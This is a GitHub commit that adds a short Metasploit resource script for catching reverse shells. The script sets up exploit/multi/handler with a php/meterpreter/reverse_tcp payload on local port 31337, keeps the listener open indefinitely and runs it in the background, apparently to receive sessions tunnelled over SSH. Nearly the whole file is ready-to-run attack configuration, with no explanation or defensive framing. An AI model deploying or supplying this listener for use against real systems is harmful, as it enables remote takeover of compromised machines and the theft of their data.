msfconsole options for meterpreter via ssh
pull/28/head
neislerjp37 2018-10-09 16:25:59 -04:00 committed by GitHub
parent 67d125b8e9
commit ac60792ca2
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 17 additions and 0 deletions

17
rc ssh Normal file
View File

@ -0,0 +1,17 @@
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set EnableContextEncoding false
set DisablePayloadHandler false
set ExitOnSession false
set ListenerTimeout 0
set LHOST 127.0.0.1
set LPORT 31337
run -j